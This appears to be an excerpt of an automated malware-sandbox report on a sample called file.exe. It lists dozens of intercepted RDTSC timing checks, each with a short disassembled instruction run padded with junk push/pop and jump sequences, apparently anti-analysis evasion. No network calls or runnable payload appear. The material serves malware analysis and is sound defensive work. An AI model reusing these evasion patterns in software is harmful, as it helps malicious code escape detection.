                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456132 second address: 45614E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 jno 00007F7E2CEB1B1Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45614E second address: 456152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 456152 second address: 456169 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEB1B1Ch 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4561C8 second address: 4561D2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4561D2 second address: 45623F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7E2CEB1B16h 0x00000009 js 00007F7E2CEB1B16h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+1245F6D2h], ebx 0x0000001b lea eax, dword ptr [ebp+12479C6Ah] 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F7E2CEB1B18h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b push eax 0x0000003c push eax 0x0000003d jmp 00007F7E2CEB1B1Fh 0x00000042 pop eax 0x00000043 mov dword ptr [esp], eax 0x00000046 jbe 00007F7E2CEB1B19h 0x0000004c movsx edx, cx 0x0000004f lea eax, dword ptr [ebp+12479C26h] 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 ja 00007F7E2CEB1B16h 0x0000005f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45623F second address: 43E1F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7E2CEC3D49h 0x0000000c jmp 00007F7E2CEC3D43h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov edx, 3F1AE100h 0x0000001a call dword ptr [ebp+122D3E87h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4996AA second address: 4996AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499B12 second address: 499B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F7E2CEC3D36h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499B21 second address: 499B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499C79 second address: 499C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499DDD second address: 499DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499DE1 second address: 499DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499DE5 second address: 499E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499E03 second address: 499E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F7E2CEC3D36h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499E1E second address: 499E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 412C2C second address: 412C3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F7E2CEC3D36h 0x0000000f pop edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 412C3C second address: 412C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Fh 0x00000007 jo 00007F7E2CEB1B1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 412C55 second address: 412C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jmp 00007F7E2CEC3D49h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CEC3D42h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 412C8D second address: 412C93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49CDD4 second address: 49CDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49CDDA second address: 49CDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49CDE3 second address: 49CDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4162A2 second address: 4162A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4162A7 second address: 4162C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D43h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4162C5 second address: 4162C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4162C9 second address: 4162F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007F7E2CEC3D36h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F860 second address: 49F888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jns 00007F7E2CEB1B16h 0x00000013 jmp 00007F7E2CEB1B24h 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F888 second address: 49F88F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FB0D second address: 49FB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FB11 second address: 49FB2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E2CEC3D3Bh 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FB2E second address: 49FB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FB32 second address: 49FB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Fh 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FB4D second address: 49FB53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6AD1 second address: 4A6AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7E2CEC3D36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6AE6 second address: 4A6AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6AEE second address: 4A6AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6E00 second address: 4A6E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6F7A second address: 4A6F84 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7E2CEC3D50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6F84 second address: 4A6FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F7E2CEB1B2Ah 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A72DA second address: 4A72E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD08E second address: 4AD092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD092 second address: 4AD0A8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CEC3D36h 0x00000008 jmp 00007F7E2CEC3D3Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABAEC second address: 4ABB02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABB02 second address: 4ABB26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Eh 0x00000007 jmp 00007F7E2CEC3D3Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABF27 second address: 4ABF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABF2D second address: 4ABF4B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7E2CEC3D41h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0C7 second address: 4AC0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455BD8 second address: 455C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D2EA4h] 0x0000000d jmp 00007F7E2CEC3D40h 0x00000012 mov ebx, dword ptr [ebp+12479C65h] 0x00000018 jmp 00007F7E2CEC3D45h 0x0000001d add eax, ebx 0x0000001f movzx ecx, ax 0x00000022 nop 0x00000023 jo 00007F7E2CEC3D44h 0x00000029 push eax 0x0000002a push edx 0x0000002b jnp 00007F7E2CEC3D36h 0x00000031 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455C24 second address: 455CAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007F7E2CEB1B2Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F7E2CEB1B18h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D2734h] 0x0000002e mov ecx, dword ptr [ebp+122D2C00h] 0x00000034 push 00000004h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F7E2CEB1B18h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F7E2CEB1B1Fh 0x00000058 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC21B second address: 4AC221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC221 second address: 4AC230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 js 00007F7E2CEB1B16h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC230 second address: 4AC245 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jno 00007F7E2CEC3D48h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F7E2CEC3D36h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ACDEA second address: 4ACDFE instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E2CEB1B16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F7E2CEB1B18h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF1F9 second address: 4AF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B18C6 second address: 4B18CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B18CA second address: 4B18E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F7E2CEC3D46h 0x0000000e jmp 00007F7E2CEC3D40h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1A2C second address: 4B1A31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1BB2 second address: 4B1BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7E2CEC3D42h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1BD0 second address: 4B1BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7DF8 second address: 4B7DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B80AE second address: 4B80B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8EAF second address: 4B8ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F7E2CEC3D36h 0x0000000e jng 00007F7E2CEC3D36h 0x00000014 jmp 00007F7E2CEC3D3Ch 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8ED0 second address: 4B8ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8ED8 second address: 4B8EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D3Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8EED second address: 4B8EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8EF1 second address: 4B8EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B91A3 second address: 4B91C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CEB1B16h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F7E2CEB1B1Dh 0x00000011 popad 0x00000012 jnc 00007F7E2CEB1B2Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B9751 second address: 4B975F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7E2CEC3D3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD7EB second address: 4BD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CEB1B22h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD7F7 second address: 4BD7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BCE80 second address: 4BCE85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD259 second address: 4BD25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD3C2 second address: 4BD3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B1Bh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD3D1 second address: 4BD3DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E2CEC3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD3DB second address: 4BD3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F7E2CEB1B22h 0x0000000c ja 00007F7E2CEB1B16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7C4A second address: 4C7C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7E2CEC3D36h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7C56 second address: 4C7C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7C5A second address: 4C7C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7F0E second address: 4C7F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B22h 0x00000009 jnc 00007F7E2CEB1B16h 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C81F3 second address: 4C81F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8380 second address: 4C8393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F7E2CEB1B1Ah 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8393 second address: 4C8397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8640 second address: 4C8644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8644 second address: 4C865E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jnc 00007F7E2CEC3D36h 0x0000000f jmp 00007F7E2CEC3D3Ah 0x00000014 pop edi 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C865E second address: 4C869D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E2CEB1B22h 0x00000008 jnl 00007F7E2CEB1B16h 0x0000000e pop eax 0x0000000f jmp 00007F7E2CEB1B24h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 js 00007F7E2CEB1B22h 0x0000001c push ebx 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C96DA second address: 4C96F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C96F8 second address: 4C971C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F7E2CEB1B25h 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C76BE second address: 4C76EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D45h 0x00000009 popad 0x0000000a jmp 00007F7E2CEC3D44h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
